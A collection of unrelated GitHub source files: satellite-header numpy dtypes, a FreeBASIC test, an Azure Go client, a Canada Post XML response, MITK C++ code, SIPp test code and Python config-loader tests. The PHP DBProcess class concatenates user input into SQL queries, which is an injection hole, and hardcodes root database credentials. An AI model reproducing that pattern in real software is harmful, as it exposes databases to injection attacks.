('SESpaceCornerL15_RMS', np.float32),
('SESpaceCornerL15_Mean', np.float32),
('SWSpaceCornerL15_RMS', np.float32),
('SWSpaceCornerL15_Mean', np.float32),
('NESpaceCornerL15_RMS', np.float32),
('NESpaceCornerL15_Mean', np.float32),
('NWSpaceCornerL15_RMS', np.float32),
('NWSpaceCornerL15_Mean', np.float32)
]
record = [
('L10RadQuality', (l10_rad_quality, 42)),
('L15RadQuality', (l15_rad_quality, 12))
]
return record
@property
def geometric_quality(self):
absolute_accuracy = [
('QualityInfoValidity', np.uint8),
('EastWestAccuracyRMS', np.float32),
('NorthSouthAccuracyRMS', np.float32),
('MagnitudeRMS', np.float32),
('EastWestUncertaintyRMS', np.float32),
('NorthSouthUncertaintyRMS', np.float32),
('MagnitudeUncertaintyRMS', np.float32),
('EastWestMaxDeviation', np.float32),
('NorthSouthMaxDeviation', np.float32),
('MagnitudeMaxDeviation', np.float32),
('EastWestUncertaintyMax', np.float32),
('NorthSouthUncertaintyMax', np.float32),
('MagnitudeUncertaintyMax', np.float32)
]
relative_accuracy = absolute_accuracy
pixels_500_relative_accuracy = absolute_accuracy
pixels_16_relative_accuracy = absolute_accuracy
misregistration_residuals = [
('QualityInfoValidity', np.uint8),
('EastWestResidual', np.float32),
('NorthSouthResidual', np.float32),
('EastWestUncertainty', np.float32),
('NorthSouthUncertainty', np.float32),
('EastWestRMS', np.float32),
('NorthSouthRMS', np.float32),
('EastWestMagnitude', np.float32),
('NorthSouthMagnitude', np.float32),
('EastWestMagnitudeUncertainty', np.float32),
('NorthSouthMagnitudeUncertainty', np.float32)
]
geometric_quality_status = [
('QualityNominal', np.uint8),
('NominalAbsolute', np.uint8),
('NominalRelativeToPreviousImage', np.uint8),
('NominalForREL500', np.uint8),
('NominalForREL16', np.uint8),
('NominalForResMisreg', np.uint8)
]
record = [
('AbsoluteAccuracy', (absolute_accuracy, 12)),
('RelativeAccuracy', (relative_accuracy, 12)),
('500PixelsRelativeAccuracy', (pixels_500_relative_accuracy, 12)),
('16PixelsRelativeAccuracy', (pixels_16_relative_accuracy, 12)),
('MisregistrationResiduals', (misregistration_residuals, 12)),
('GeometricQualityStatus', (geometric_quality_status, 12))
]
return record
@property
def timeliness_and_completeness(self):
timeliness = [
('MaxDelay', np.float32),
('MinDelay', np.float32),
('MeanDelay', np.float32)
]
completeness = [
('PlannedL15ImageLines', np.uint16),
('GeneratedL15ImageLines', np.uint16),
('ValidL15ImageLines', np.uint16),
('DummyL15ImageLines', np.uint16),
('CorruptedL15ImageLines', np.uint16)
]
record = [
('Timeliness', timeliness),
('Completeness', (completeness, 12))
]
return record
class HritPrologue(L15DataHeaderRecord):
def get(self):
# X bytes
record = [
('SatelliteStatus', self.satellite_status),
('ImageAcquisition', self.image_acquisition),
('CelestialEvents', self.celestial_events),
('ImageDescription', self.image_description),
('RadiometricProcessing', self.radiometric_processing),
('GeometricProcessing', self.geometric_processing)
]
return np.dtype(record).newbyteorder('>')
hrit_epilogue = np.dtype(
Msg15NativeTrailerRecord().seviri_l15_trailer).newbyteorder('>')
hrit_prologue = HritPrologue().get()
impf_configuration = np.dtype(
L15DataHeaderRecord().impf_configuration).newbyteorder('>')
native_header = Msg15NativeHeaderRecord().get()
native_trailer = Msg15NativeTrailerRecord().get()
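def _example_parse_native_trailer(raw_bytes):
    """Illustrative sketch, not part of the original module.

    Shows one way the big-endian structured dtypes built above might be used:
    decoding a raw trailer blob with numpy and drilling into nested fields.
    Assumes ``raw_bytes`` holds at least ``native_trailer.itemsize`` bytes;
    the function name and the fields picked here are only for illustration.
    """
    trailer = np.frombuffer(raw_bytes, dtype=native_trailer, count=1)
    # Nested records are addressed by field name, e.g. the forward scan start
    # time inside the actual scanning summary of the image production stats.
    stats = trailer['15TRAILER']['ImageProductionStats']
    return stats['ActualScanningSummary']['ForwardScanStart']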
| {
"pile_set_name": "Github"
} |
# include "fbcunit.bi"
#if (__FB_BACKEND__ = "gas")
#define DOTEST
#endif
'' for other targets, see va_int_and_ptrs-gcc.bas
#ifdef DOTEST
SUITE( fbc_tests.functions.va_int_and_ptrs )
sub varints cdecl ( byval n as integer, ... )
dim va as any ptr
dim i as integer
va = va_first( )
for i = 1 to n
CU_ASSERT( va_arg( va, integer ) = i )
va = va_next( va, integer )
next
end sub
sub varintptrs cdecl ( byval n as integer, ... )
dim va as any ptr
dim i as integer
va = va_first( )
for i = 1 to n
CU_ASSERT( *va_arg( va, integer ptr ) )
va = va_next( va, integer ptr )
next
end sub
sub vaints_test( d as integer )
dim as integer a, b, c
dim as integer ptr pa, pb, pc
dim as integer ptr ptr ppc
a = 1
b = 2
c = 3
pa = @a
pb = @b
pc = @c
ppc = @pc
varints 4, a, *pb, **ppc, d
varintptrs 4, pa, pb, pc, @d
end sub
TEST( varIntegerArgs )
vaints_test 4
END_TEST
END_SUITE
#endif
| {
"pile_set_name": "Github"
} |
package peering
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"context"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/tracing"
"net/http"
)
// OperationsClient is the peering Client
type OperationsClient struct {
BaseClient
}
// NewOperationsClient creates an instance of the OperationsClient client.
func NewOperationsClient(subscriptionID string) OperationsClient {
return NewOperationsClientWithBaseURI(DefaultBaseURI, subscriptionID)
}
// NewOperationsClientWithBaseURI creates an instance of the OperationsClient client using a custom endpoint. Use this
// when interacting with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure stack).
func NewOperationsClientWithBaseURI(baseURI string, subscriptionID string) OperationsClient {
return OperationsClient{NewWithBaseURI(baseURI, subscriptionID)}
}
// List lists all of the available API operations for peering resources.
func (client OperationsClient) List(ctx context.Context) (result OperationListResultPage, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/OperationsClient.List")
defer func() {
sc := -1
if result.olr.Response.Response != nil {
sc = result.olr.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
result.fn = client.listNextResults
req, err := client.ListPreparer(ctx)
if err != nil {
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "List", nil, "Failure preparing request")
return
}
resp, err := client.ListSender(req)
if err != nil {
result.olr.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "List", resp, "Failure sending request")
return
}
result.olr, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "List", resp, "Failure responding to request")
}
if result.olr.hasNextLink() && result.olr.IsEmpty() {
err = result.NextWithContext(ctx)
}
return
}
// ListPreparer prepares the List request.
func (client OperationsClient) ListPreparer(ctx context.Context) (*http.Request, error) {
const APIVersion = "2020-04-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPath("/providers/Microsoft.Peering/operations"),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// ListSender sends the List request. The method will close the
// http.Response Body if it receives an error.
func (client OperationsClient) ListSender(req *http.Request) (*http.Response, error) {
return client.Send(req, autorest.DoRetryForStatusCodes(client.RetryAttempts, client.RetryDuration, autorest.StatusCodesForRetry...))
}
// ListResponder handles the response to the List request. The method always
// closes the http.Response Body.
func (client OperationsClient) ListResponder(resp *http.Response) (result OperationListResult, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// listNextResults retrieves the next set of results, if any.
func (client OperationsClient) listNextResults(ctx context.Context, lastResults OperationListResult) (result OperationListResult, err error) {
req, err := lastResults.operationListResultPreparer(ctx)
if err != nil {
return result, autorest.NewErrorWithError(err, "peering.OperationsClient", "listNextResults", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "peering.OperationsClient", "listNextResults", resp, "Failure sending next results request")
}
result, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "listNextResults", resp, "Failure responding to next results request")
}
return
}
// ListComplete enumerates all values, automatically crossing page boundaries as required.
func (client OperationsClient) ListComplete(ctx context.Context) (result OperationListResultIterator, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/OperationsClient.List")
defer func() {
sc := -1
if result.Response().Response.Response != nil {
sc = result.page.Response().Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
result.page, err = client.List(ctx)
return
}
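// exampleListAllOperations is an illustrative sketch, not part of the
// generated client: it assumes a configured autorest.Authorizer is at hand
// and shows one way to walk every available operation with the iterator
// returned by ListComplete. The subscription ID below is a placeholder.
func exampleListAllOperations(ctx context.Context, authorizer autorest.Authorizer) ([]Operation, error) {
	client := NewOperationsClient("00000000-0000-0000-0000-000000000000")
	client.Authorizer = authorizer
	var ops []Operation
	iter, err := client.ListComplete(ctx)
	if err != nil {
		return nil, err
	}
	for iter.NotDone() {
		ops = append(ops, iter.Value())
		if err := iter.NextWithContext(ctx); err != nil {
			return ops, err
		}
	}
	return ops, nil
}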
| {
"pile_set_name": "Github"
} |
<?php
class DBProcess extends Unit
{
const DB_HOST='localhost';
const DB_USER='root';
const DB_PASS='root';
const DB_DBNAME='testDB';
public function stimulate(&$hash){
$db = new MYSQL;
$db->connect(self::DB_HOST, self::DB_USER, self::DB_PASS, self::DB_DBNAME);
$db->query("SET NAMES 'UTF8'");
//must have a string parameter 'action'
LINB::checkArgs($hash, array(
'string' => array(
'action' => NULL
)
));
//handle the process
switch($hash->action) {
case 'getlist':
return $db->query("select `key`,`value` from `tbl_test`");
case 'update':
//must have string parameters 'key' and 'value'
LINB::checkArgs($hash, array(
'string' => array(
'key' => NULL,
'value' => NULL
)
));
$db->update("tbl_test",array("key"=>$hash->key, "value"=>$hash->value), "`key`='".$hash->key."'");
return 'ok';
case 'delete':
//must have a string parameter 'key'
LINB::checkArgs($hash, array(
'string' => array(
'key' => NULL
)
));
$db->delete("tbl_test", "`key`='".$hash->key."'");
return 'ok';
case 'create':
//must have string parameters 'key' and 'value'
LINB::checkArgs($hash, array(
'string' => array(
'key' => NULL,
'value' => NULL
)
));
$db->insert("tbl_test", array("key"=>$hash->key, "value"=>$hash->value));
return 'ok';
}
}
}
?>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<!DOCTYPE eparcel [
<!-- EVERY REQUEST CONTAIN THE eparcel TAG -->
<!ELEMENT eparcel (ratesAndServicesResponse)>
<!-- ********************************************************* -->
<!-- * Standard response for request for rates and services * -->
<!-- ********************************************************* -->
<!ELEMENT ratesAndServicesResponse (statusCode , statusMessage+ , requestID , handling , language , product+ , packing* , emptySpace* , shippingOptions , comment , nearestPostalOutlet*)>
<!ELEMENT statusCode (#PCDATA)>
<!ELEMENT statusMessage (#PCDATA)>
<!ELEMENT requestID (#PCDATA)>
<!ELEMENT handling (#PCDATA)>
<!ELEMENT language (#PCDATA)>
<!ELEMENT product (name , rate , shippingDate , deliveryDate , deliveryDayOfWeek , nextDayAM? , packingID)>
<!ATTLIST product id CDATA #REQUIRED>
<!ATTLIST product sequence CDATA #REQUIRED>
<!ELEMENT name (#PCDATA)>
<!ELEMENT rate (#PCDATA)>
<!ELEMENT shippingDate (#PCDATA)>
<!ELEMENT deliveryDate (#PCDATA)>
<!ELEMENT deliveryDayOfWeek (#PCDATA)>
<!ELEMENT nextDayAM (#PCDATA)>
<!ELEMENT packingID (#PCDATA)>
<!ELEMENT packing (packingID , box+)>
<!ELEMENT box (name , weight , expediterWeight , length , width , height , packedItem+)>
<!ELEMENT weight (#PCDATA)>
<!ELEMENT expediterWeight (#PCDATA)>
<!ELEMENT length (#PCDATA)>
<!ELEMENT width (#PCDATA)>
<!ELEMENT height (#PCDATA)>
<!ELEMENT packedItem (quantity , description)>
<!ELEMENT quantity (#PCDATA)>
<!ELEMENT description (#PCDATA)>
<!ELEMENT emptySpace (length , width , height , weight)>
<!ELEMENT shippingOptions (insurance , deliveryConfirmation , signature , flexiblePaymentAvailable?)>
<!ELEMENT insurance (#PCDATA)>
<!ELEMENT deliveryConfirmation (#PCDATA)>
<!ELEMENT signature (#PCDATA)>
<!ELEMENT flexiblePaymentAvailable EMPTY>
<!ELEMENT comment (#PCDATA)>
<!-- ********************************************************* -->
<!-- * 'nearestPostalOutlet' is optional and is returned * -->
<!-- * only if the merchant profile has this option enabled * -->
<!-- ********************************************************* -->
<!ELEMENT nearestPostalOutlet (postalOutletSequenceNo , distance , outletName , businessName , postalAddress , phoneNumber , businessHours+)>
<!ELEMENT postalOutletSequenceNo (#PCDATA)>
<!ELEMENT distance (#PCDATA)>
<!ELEMENT outletName (#PCDATA)>
<!ELEMENT businessName (#PCDATA)>
<!ELEMENT postalAddress (addressLine+ , postalCode , municipality , province?)>
<!ELEMENT addressLine (#PCDATA)>
<!ELEMENT postalCode (#PCDATA)>
<!ELEMENT municipality (#PCDATA)>
<!ELEMENT province (#PCDATA)>
<!ELEMENT phoneNumber (#PCDATA)>
<!ELEMENT businessHours (dayId , dayOfWeek , time)>
<!ELEMENT dayId (#PCDATA)>
<!ELEMENT dayOfWeek (#PCDATA)>
<!ELEMENT time (#PCDATA)>
]>
<eparcel>
<ratesAndServicesResponse>
<statusCode>1</statusCode>
<statusMessage>OK</statusMessage>
<requestID>6877575</requestID>
<handling>0.0</handling>
<language>0</language>
<product id="1040" sequence="1">
<name>Priority Courier</name>
<rate>40.28</rate>
<shippingDate>2010-08-03</shippingDate>
<deliveryDate>2010-08-04</deliveryDate>
<deliveryDayOfWeek>4</deliveryDayOfWeek>
<nextDayAM>true</nextDayAM>
<packingID>P_0</packingID>
</product>
<product id="1020" sequence="2">
<name>Expedited</name>
<rate>17.16</rate>
<shippingDate>2010-08-03</shippingDate>
<deliveryDate>2010-08-04</deliveryDate>
<deliveryDayOfWeek>4</deliveryDayOfWeek>
<nextDayAM>false</nextDayAM>
<packingID>P_0</packingID>
</product>
<product id="1010" sequence="3">
<name>Regular</name>
<rate>17.16</rate>
<shippingDate>2010-08-03</shippingDate>
<deliveryDate>2010-08-06</deliveryDate>
<deliveryDayOfWeek>6</deliveryDayOfWeek>
<nextDayAM>false</nextDayAM>
<packingID>P_0</packingID>
</product>
<packing>
<packingID>P_0</packingID>
<box>
<name>Small Box</name>
<weight>1.691</weight>
<expediterWeight>1.691</expediterWeight>
<length>25.0</length>
<width>17.0</width>
<height>16.0</height>
<packedItem>
<quantity>1</quantity>
<description>KAO Diskettes</description>
</packedItem>
</box>
<box>
<name>My Ready To Ship Item</name>
<weight>2.0</weight>
<expediterWeight>1.5</expediterWeight>
<length>30.0</length>
<width>20.0</width>
<height>20.0</height>
<packedItem>
<quantity>1</quantity>
<description>My Ready To Ship Item</description>
</packedItem>
</box>
</packing>
<shippingOptions>
<insurance>No</insurance>
<deliveryConfirmation>No</deliveryConfirmation>
<signature>No</signature>
</shippingOptions>
<comment/>
</ratesAndServicesResponse>
</eparcel>
<!--END_OF_EPARCEL-->
| {
"pile_set_name": "Github"
} |
/*============================================================================
The Medical Imaging Interaction Toolkit (MITK)
Copyright (c) German Cancer Research Center (DKFZ)
All rights reserved.
Use of this source code is governed by a 3-clause BSD license that can be
found in the LICENSE file.
============================================================================*/
#include "mitkTemporalJoinImagesFilter.h"
#include <numeric>
#include "mitkArbitraryTimeGeometry.h"
#include "mitkImageReadAccessor.h"
#include "mitkTemporoSpatialStringProperty.h"
void mitk::TemporalJoinImagesFilter::SetMaxTimeBounds(const TimeBoundsVectorType& timeBounds)
{
m_MaxTimeBounds = timeBounds;
this->Modified();
}
void mitk::TemporalJoinImagesFilter::GenerateInputRequestedRegion()
{
Superclass::GenerateInputRequestedRegion();
const auto nrOfInputs = this->GetNumberOfInputs();
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
this->GetInput(pos)->SetRequestedRegionToLargestPossibleRegion();
}
}
void mitk::TemporalJoinImagesFilter::GenerateOutputInformation()
{
mitk::Image::ConstPointer input = this->GetInput();
mitk::Image::Pointer output = this->GetOutput();
const auto nrOfInputs = this->GetNumberOfInputs();
auto timeBounds = m_MaxTimeBounds;
if (timeBounds.empty())
{
timeBounds.resize(nrOfInputs);
std::iota(timeBounds.begin(), timeBounds.end(), 1.0);
}
else if(timeBounds.size() != nrOfInputs)
{
mitkThrow() << "User-defined max time bounds do not match the number of inputs (" << nrOfInputs << "). Size of max time bounds is " << timeBounds.size() << ", but it should be " << nrOfInputs << ".";
}
timeBounds.insert(timeBounds.begin(), m_FirstMinTimeBound);
auto timeGeo = mitk::ArbitraryTimeGeometry::New();
timeGeo->ReserveSpaceForGeometries(nrOfInputs);
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
timeGeo->AppendNewTimeStepClone(this->GetInput(pos)->GetGeometry(), timeBounds[pos], timeBounds[pos + 1]);
}
output->Initialize(input->GetPixelType(), *timeGeo);
auto newPropList = input->GetPropertyList()->Clone();
for (DataObjectPointerArraySizeType pos = 1; pos < nrOfInputs; ++pos)
{
const auto otherList = this->GetInput(pos)->GetPropertyList();
for (const auto& key : otherList->GetPropertyKeys())
{
auto prop = newPropList->GetProperty(key);
if (prop == nullptr)
{
newPropList->SetProperty(key, otherList->GetProperty(key)->Clone());
}
else
{
auto tempoSpatialProp = dynamic_cast<mitk::TemporoSpatialStringProperty*>(prop);
auto oTempoSpatialProp = dynamic_cast<mitk::TemporoSpatialStringProperty*>(otherList->GetProperty(key));
if (tempoSpatialProp != nullptr && oTempoSpatialProp != nullptr)
{
auto availableSlices = oTempoSpatialProp->GetAvailableSlices(0);
for (const auto& sliceID : availableSlices)
{
tempoSpatialProp->SetValue(pos, sliceID, oTempoSpatialProp->GetValueBySlice(sliceID));
}
}
// Other property types can be ignored; we only keep the values of the first frame.
}
}
}
output->SetPropertyList(newPropList);
}
void mitk::TemporalJoinImagesFilter::GenerateData()
{
mitk::Image::Pointer output = this->GetOutput();
mitk::Image::ConstPointer refInput = this->GetInput();
const auto nrOfInputs = this->GetNumberOfInputs();
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
if (!Equal(*(refInput->GetGeometry()), *(this->GetInput(pos)->GetGeometry()), mitk::eps, false))
{
mitkThrow() << "Cannot fuse images. At least image #" << pos << " has another geometry than the first image.";
}
if (refInput->GetPixelType() != this->GetInput(pos)->GetPixelType())
{
mitkThrow() << "Cannot fuse images. At least image #" << pos << " has another pixeltype than the first image.";
}
}
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
mitk::ImageReadAccessor accessor(this->GetInput(pos));
output->SetVolume(accessor.GetData(), pos);
}
}
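// Illustrative usage sketch, not part of the original file. It assumes the
// filter follows the usual MITK image-to-image filter pattern (New(),
// SetInput(), Update(), GetOutput()) declared in the accompanying header,
// and the time bound values are made up. Both inputs must share geometry and
// pixel type, as enforced in GenerateData() above.
static mitk::Image::Pointer ExampleFuseTwoFrames(mitk::Image* frame0, mitk::Image* frame1)
{
  auto filter = mitk::TemporalJoinImagesFilter::New();
  filter->SetInput(0, frame0);
  filter->SetInput(1, frame1);
  filter->SetMaxTimeBounds({42.0, 85.0}); // assumed upper time bound per frame
  filter->Update();
  return filter->GetOutput();
}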
| {
"pile_set_name": "Github"
} |
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* Author : Rob Day - 11 May 2014
*/
#define GLOBALS_FULL_DEFINITION
#include "sipp.hpp"
#include "gtest/gtest.h"
#include "gmock/gmock.h"
#include <string.h>
namespace testing {
std::string FLAGS_gmock_verbose = "verbose";
}
int main(int argc, char* argv[])
{
globalVariables = new AllocVariableTable(NULL);
userVariables = new AllocVariableTable(globalVariables);
main_scenario = new scenario(0, 0);
::testing::InitGoogleTest(&argc, argv);
return RUN_ALL_TESTS();
}
/* Quick fix so that unit tests depending on sipp_exit still link,
 * now that sipp_exit has been moved into sipp.cpp, which is not
 * included here. */
void sipp_exit(int rc, int rtp_errors, int echo_errors)
{
exit(rc);
}
| {
"pile_set_name": "Github"
} |
# Locally calculated
sha256 756e291d4f557d88cd50c4fe3b8454ec238362d22cedb3e6173240d90f0a80fa webrtc-audio-processing-0.3.tar.xz
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
import unittest
import random
import sys
sys.path.append('../pybingwallpaper')
import config
from config import ConfigParameter
from config import ConfigDatabase
from config import CommandLineArgumentsLoader
from config import DefaultValueLoader
from config import ConfigFileLoader
from config import ConfigFileDumper
from config import Namespace
def getdb():
return ConfigDatabase('test1', description='test desc')
# TODO: Add cases to test loader_srcs option
class TestConfigureParameter(unittest.TestCase):
def setUp(self):
pass
def test_import_config_module(self):
self.assertIsNotNone(ConfigParameter)
self.assertIsNotNone(ConfigDatabase)
def test_init_param(self):
p = ConfigParameter('test1')
self.assertIsNotNone(p)
def test_name(self):
names = ['klb', '1ab', 's#a']
for n in names:
p = ConfigParameter(name = n)
self.assertEqual(p.name, n)
def test_invalid_name(self):
names = ['k b', '\tab', 's\na']
for n in names:
with self.assertRaises(ValueError, msg="parameter name can't contain space"):
ConfigParameter(name = n)
class TestConfigureDatabase(unittest.TestCase):
def setUp(self):
pass
def test_prog(self):
db = getdb()
self.assertEqual(db.prog, 'test1')
def test_desc(self):
db = ConfigDatabase('test1', 'a test database')
self.assertEqual(db.prog, 'test1')
self.assertEqual(db.description, 'a test database')
def test_parameter_init(self):
params = [
ConfigParameter('123'),
ConfigParameter('456')
]
db = ConfigDatabase('test1', parameters=params)
self.assertListEqual(db.parameters, params)
def test_repr(self):
params = [
ConfigParameter('123', type=''),
ConfigParameter('456', type='')
]
db = ConfigDatabase('test1', description='test desc', parameters=params)
dbcopy = eval(repr(db))
self.assertEqual(db.prog, dbcopy.prog)
self.assertEqual(db.description, dbcopy.description)
self.assertListEqual(db.parameters, dbcopy.parameters)
def test_add_parameters(self):
params = [
ConfigParameter('123'),
ConfigParameter('456')
]
new_param = ConfigParameter('789')
db = ConfigDatabase('test1', description='test desc', parameters=params)
self.assertListEqual(db.parameters, params)
db.add_param(new_param)
self.assertListEqual(db.parameters, params+[new_param,])
def test_no_dup_param(self):
params = [
ConfigParameter('123', type=int),
ConfigParameter('456', defaults=9)
]
new_param = ConfigParameter('123')
db = ConfigDatabase('test1', description='test desc', parameters=params)
self.assertListEqual(db.parameters, params)
with self.assertRaises(NameError, msg='duplicated parameter name "%s" found'%(new_param.name,)):
db.add_param(new_param)
self.assertListEqual(db.parameters, params)
class TestCliLoader(unittest.TestCase):
def getdb(self):
return ConfigDatabase('test1', description='test desc')
def getloader(self):
return CommandLineArgumentsLoader()
def test_invalid_arg(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param1', type=int)
db.add_param(p)
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--not-exist'])
self.assertEqual(se.exception.code, 2)
def test_version(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='notused', loader_opts={'cli':{
'action': 'version',
'flags':('-v','--version'),
'version': 'test-version-1234'
}})
db.add_param(p)
with self.assertRaises(SystemExit) as se:
loader.load(db, ['-v'])
self.assertEqual(se.exception.code, 0)
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--version'])
self.assertEqual(se.exception.code, 0)
def test_name(self):
db = getdb()
cli_opts = {'flags':['-p']}
p = ConfigParameter(name='param1', type=lambda s:int(s,0), loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--param1', '1'])
self.assertEqual(se.exception.code, 2)
ans = loader.load(db, ['-p', '1'])
self.assertEqual(getattr(ans, p.name), 1)
def test_load_int(self):
ds = [
('0', 0),
('0x1aedead0b', 0x1aedead0b),
('0b0011', 3),
('-9571293', -9571293),
]
db = getdb()
p = ConfigParameter(name='param1', type=lambda s:int(s,0))
db.add_param(p)
loader = self.getloader()
for s, d in ds:
ans = loader.load(db, ['--param1', s])
self.assertEqual(getattr(ans, p.name), d)
def test_load_str(self):
ds = [
' ',
'#123',
'as_',
'9 9'
]
db = getdb()
p = ConfigParameter(name='param1')
db.add_param(p)
loader = self.getloader()
for s in ds:
ans = loader.load(db, ['--param1', s])
self.assertEqual(getattr(ans, p.name), s)
def test_load_choice(self):
good = ['c1', 'c3', 'c2']
choices = ('c0', 'c1', 'c2', 'c3')
db = getdb()
p = ConfigParameter(name='param1', defaults='c1', choices=choices)
db.add_param(p)
loader = self.getloader()
# try legal ones
for s in good:
ans = loader.load(db, ['--param1', s], generate_default=True)
self.assertEqual(getattr(ans, p.name), s)
# test use default
ans = loader.load(db, [], generate_default=True)
self.assertEqual(getattr(ans, p.name), good[0])
# test illegal value
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--param1', 'no-good'], generate_default=True)
self.assertEqual(se.exception.code, 2)
def test_load_true(self):
cli_opts = {'action':'store_true'}
db = getdb()
p = ConfigParameter(name='param1', defaults=False, loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
ans = loader.load(db, ['--param1'])
self.assertTrue(getattr(ans, p.name))
ans = loader.load(db, [])
self.assertFalse(hasattr(ans, p.name))
ans = loader.load(db, [], generate_default=True)
self.assertFalse(getattr(ans, p.name))
def test_load_false(self):
cli_opts = {'action':'store_false'}
db = getdb()
p = ConfigParameter(name='param1', defaults=True, loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
ans = loader.load(db, ['--param1'])
self.assertFalse(getattr(ans, p.name))
ans = loader.load(db, [], generate_default=True)
self.assertTrue(getattr(ans, p.name))
def test_load_count(self):
cli_opts = {'action':'count'}
db = getdb()
p = ConfigParameter(name='d', defaults=0, loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
ans = loader.load(db, ['-d'], generate_default=True)
self.assertEqual(getattr(ans, p.name), 1)
ans = loader.load(db, [], generate_default=True)
self.assertEqual(getattr(ans, p.name), 0)
ans = loader.load(db, ['-d', '-d', '-d'], generate_default=True)
self.assertEqual(getattr(ans, p.name), 3)
c = random.randint(0, 256)
ans = loader.load(db, ['-'+'d'*c], generate_default=True)
self.assertEqual(getattr(ans, p.name), c)
class TestDefaultValueLoader(unittest.TestCase):
def getloader(self, platform=None):
return DefaultValueLoader(platform)
def test_load_plain_def(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='intparam', defaults=0)
db.add_param(p)
p = ConfigParameter(name='strparam', defaults='blah blah blah')
db.add_param(p)
p = ConfigParameter(name='noneparam')
db.add_param(p)
ans = loader.load(db)
self.assertEqual(ans.intparam, 0)
self.assertEqual(ans.strparam, 'blah blah blah')
self.assertIsNone(ans.noneparam)
def test_load_cur_platform(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param', defaults={sys.platform:'myval', '*':'otherval'})
db.add_param(p)
ans = loader.load(db)
self.assertEqual(ans.param, 'myval')
def test_load_other_platform(self):
defs = {
'linux': 'linuxval',
'win': 'win32val',
'*': 'otherval'
}
db = getdb()
p = ConfigParameter(name='param', defaults=defs)
db.add_param(p)
loader = self.getloader('linux')
ans = loader.load(db)
self.assertEqual(ans.param, 'linuxval')
loader = self.getloader('darwin')
ans = loader.load(db)
self.assertEqual(ans.param, 'otherval')
loader = self.getloader('win')
ans = loader.load(db)
self.assertEqual(ans.param, 'win32val')
def test_load_with_type(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param', type=lambda x:int(x,0), defaults='0xffff')
db.add_param(p)
ans = loader.load(db)
self.assertEqual(type(ans.param), int)
self.assertEqual(ans.param, 0xffff)
def test_load_overwrite(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param', defaults='defval')
db.add_param(p)
ans = loader.load(db)
self.assertEqual(ans.param, 'defval')
ans.param = 'modified'
self.assertEqual(ans.param, 'modified')
from io import StringIO
class TestConfigFileLoader(unittest.TestCase):
def setUp(self):
self.config_file = StringIO('''
[DEFAULT]
# default section values
topParam1 = 1
topParam2 = "s-value"
topParam3 =
[section1]
secParam1 = 1 2 3
secParam2 =
[section3]
secParam2 = somevalue
''')
def getloader(self):
return ConfigFileLoader()
def test_load_plain_value(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='topParam1')
db.add_param(p)
p = ConfigParameter(name='topParam2')
db.add_param(p)
p = ConfigParameter(name='topParam3')
db.add_param(p)
p = ConfigParameter(name='topParamx')
db.add_param(p)
ans = loader.load(db, self.config_file)
self.assertEqual(ans.topParam1, '1')
self.assertEqual(ans.topParam2, '"s-value"')
self.assertEqual(ans.topParam3, '')
